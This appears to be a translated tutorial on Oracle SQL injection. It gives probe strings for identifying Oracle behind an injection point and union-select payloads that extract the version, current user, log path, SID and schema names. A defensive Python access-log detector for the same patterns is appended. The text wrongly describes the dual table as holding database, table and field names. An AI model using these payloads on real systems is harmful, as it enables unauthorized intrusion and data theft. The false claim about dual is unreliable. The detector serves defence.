Basic Oracle Injection Point Information Detection
Detecting an Oracle injection point is a special case. Unlike with other databases, several steps are needed to confirm that the database behind the injection point is Oracle.
Determining whether the injection point is Oracle
First, determine whether it is an Oracle injection point by submitting the following in order:
and 1=1
and 1=2
If the two requests return different pages, the injection vulnerability exists. Next, submit the following characters at the injection point:
/*
"/*" is a comment in MySQL. If an error is returned, the injection point is not MySQL. Continue by submitting the following characters:
--
"--" is a comment marker supported by Oracle and MSSQL. If the page returns normally, the database is one of these two types. Continue by submitting the following character:
;
";" is the statement separator. Oracle does not support multi-statement queries, so if an error is returned, the database is likely Oracle. Then submit the following query:
and exists (select * from dual)
or
and (select count(*) from user_tables)>0 --
dual and user_tables are system tables in Oracle. If a normal page is returned, the injection point can be confirmed as Oracle.
Gathering injection point information
Once the database type is determined, proceed as with the earlier MySQL injection: use order by x to guess the number of fields, then use union select to obtain the desired information.
The most important piece of information is the database version. It can be obtained with (select banner from sys.v_$version where rownum=1), for example:
and 1=2 union select 1, 2, 3, (select banner from sys.v_$version where rownum=1), 4, 5 ...... from dual
To obtain the username of the current database connection, submit the following query:
and 1=2 union select 1, 2, 3, (select SYS_CONTEXT('userenv', 'current_user') from dual) ...... from dual
Execute the following query:
and 1=2 union select 1, 2, 3, (select member from v$logfile where rownum=1), 4, 5 ...... from dual
You can determine the operating system platform by querying the absolute path of the log file.
To obtain the server SID, run the following query:
and 1=2 union select 1, 2, 3, (select instance_name from v$instance), 4, 5 ...... from dual
Using Oracle system tables to expose database content
As with MySQL, Oracle system tables can be used to directly expose all of the contents of the database. Oracle has the dual system table, which stores information such as database names, table names, and field names. The whole database structure can be obtained by injecting against this table, which makes it easy to query the administrator account data.
Enumerating database names
Submit at the injection point:
and 1=2 union select 1, 2, 3, (select owner from all_tables where rownum=1), 4, 5 ...... from dual
This returns the name of the first database. Then continue by submitting:
and 1=2 union select 1, 2, 3, (select owner from all_tables where rownum=1 and owner<>'first database name') ...... from dual
In the same way, you can obtain the names of all the databases in the current user's database.
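From the defender's side, the probe sequence described on this page leaves a recognizable trail in web access logs. The following is an added example, not part of the original article: a small detector that flags request parameters containing the generic probes and the Oracle object names used above. The log format, the /news.jsp endpoint and the sample lines are constructed assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qsl

LOG = re.compile(r'^(\S+) \S+ \S+ \[[^\]]*\] "(?:GET|POST) (\S+) [^"]*" (\d{3})')
# Oracle objects named in the queries above; rare in legitimate parameter values.
ORACLE = re.compile(
    r"(?:\bsys\.)?\bv_?\$(?:version|logfile|instance)\b"
    r"|\b(?:user_tables|all_tables|sys_context)\b|\bfrom\s+dual\b", re.I)
GENERIC = re.compile(
    r"\band\s+\d+\s*=\s*\d+|\bunion\s+(?:all\s+)?select\b|\border\s+by\s+\d+", re.I)

def normalize(value):
    """Collapse SQL block comments and whitespace runs so spacing tricks do not hide a match."""
    value = re.sub(r"/\*.*?\*/", " ", value, flags=re.S)
    return re.sub(r"\s+", " ", value).strip()

def classify(value):
    v = normalize(value)
    if ORACLE.search(v):
        return "oracle-enum"   # Oracle fingerprinting or dictionary enumeration
    if GENERIC.search(v):
        return "sqli-probe"    # boolean pair, union select, or order by N
    return None

def scan(lines):
    """Return {client_ip: [(label, param, status), ...]} for suspicious requests."""
    hits = {}
    for line in lines:
        m = LOG.match(line)
        if not m:
            continue
        ip, target, status = m.group(1), m.group(2), int(m.group(3))
        for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
            label = classify(value)
            if label:
                hits.setdefault(ip, []).append((label, name, status))
    return hits

# Constructed sample access-log lines (documentation IP ranges, hypothetical endpoint).
SAMPLE = [
    '198.51.100.9 - - [01/Jan/2024:10:00:00 +0000] "GET /news.jsp?id=12 HTTP/1.1" 200 5120',
    '203.0.113.7 - - [01/Jan/2024:10:00:05 +0000] "GET /news.jsp?id=12%20and%201=1 HTTP/1.1" 200 5120',
    '203.0.113.7 - - [01/Jan/2024:10:00:06 +0000] "GET /news.jsp?id=12%20and%201=2 HTTP/1.1" 200 310',
    '203.0.113.7 - - [01/Jan/2024:10:00:09 +0000] "GET /news.jsp?id=12%20and%20exists(select%20*%20from%20dual) HTTP/1.1" 200 5120',
    '203.0.113.7 - - [01/Jan/2024:10:00:15 +0000] "GET /news.jsp?id=12+and+1=2+union+select+1,(select+banner+from+sys.v_$version+where+rownum=1)+from+dual HTTP/1.1" 200 5300',
]

if __name__ == "__main__":
    print(scan(SAMPLE))
```

A client that moves from "sqli-probe" to "oracle-enum" hits with 200 responses is the pattern to escalate. The phrase "from dual" can also occur in ordinary text fields, so treat a single hit as a triage signal rather than proof.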